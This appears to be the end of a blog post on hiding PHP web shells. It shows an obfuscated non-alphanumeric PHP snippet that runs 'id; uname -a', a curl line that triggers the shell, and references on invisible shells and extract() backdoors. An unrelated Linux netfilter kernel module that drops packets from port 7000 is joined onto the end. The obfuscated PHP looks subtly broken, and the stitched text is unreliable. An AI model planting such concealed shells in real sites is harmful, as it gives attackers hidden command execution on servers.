($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++).
($ ___ [] = $ _ ++). ($ _ ++)
(_____ = $ ___ [2]. $ ___ [4]. ___ [2]. ___ [3]. ___ [0]. ___ [1])
($ _____ ('id; uname -a'));

Execution: curl -v 'http://localhost/shell.php'

Note: There are thousands more techniques, and I will try to make other posts about.

References

• http://php.net/manual/en/language.operators.execution.php#language.operators.execution

• http://php.net/manual/en/functions.variable-functions.php

• http://php.net/manual/en/function.exec.php

• http://php.net/manual/en/function.shell-exec.php

• http://php.net/manual/en/function.system.php

• http://php.net/manual/en/function.passthru.php

• http://php.net/manual/en/function.get-defined-vars.php

• http://php.net/manual/en/function.extract.php

• http://php.net/manual/en/function.create-function.php

• http://php.net/manual/en/function.extract.php

• http://php.net/manual/en/reserved.variables.server.php

• https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell

• https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

 #include <linux/kernel.h>
 #include <linux/module.h>
 #include <linux/netfilter.h>
 #include <linux/netfilter_ipv4.h>
 #include <linux/skbuff.h>
 #include <linux/tcp.h>
 #include <linux/udp.h>
 #include <linux/ip.h>

static struct nf_hook_ops nfho;
struct tcphdr *tcp_header;
struct iphdr *ip_header;

unsigned int hook_func(
  const struct nf_hook_ops *ops, 
  struct sk_buff *skb, 
  const struct net_device *in, 
  const struct net_device *out, 
  int (*okfn)(struct sk_buff *)) {

  ip_header = (struct iphdr *)skb_network_header(skb);
  if (ip_header->protocol == /* TCP */ 6) {
    tcp_header = tcp_hdr(skb);
    u32 saddr, daddr;
    u16 sport, dport;
    saddr = ntohl(ip_header->saddr);
    daddr = ntohl(ip_header->daddr);
    sport = ntohs(tcp_header->source);
    dport = ntohs(tcp_header->dest);

// if packet from local port 7000, drop it.
    if (sport == 7000) {
      printk(KERN_INFO "got tcp packet at 7000 port.\n");
      return NF_DROP;
    }
  }
  return NF_ACCEPT;
}

int init_module() {
  nfho.hook = hook_func;
  nfho.hooknum = NF_INET_LOCAL_OUT;
  nfho.pf = PF_INET;
  nfho.priority = NF_IP_PRI_FIRST;
  nf_register_hook(&nfho);
  return 0;
}

void cleanup_module() {
  nf_unregister_hook(&nfho);
}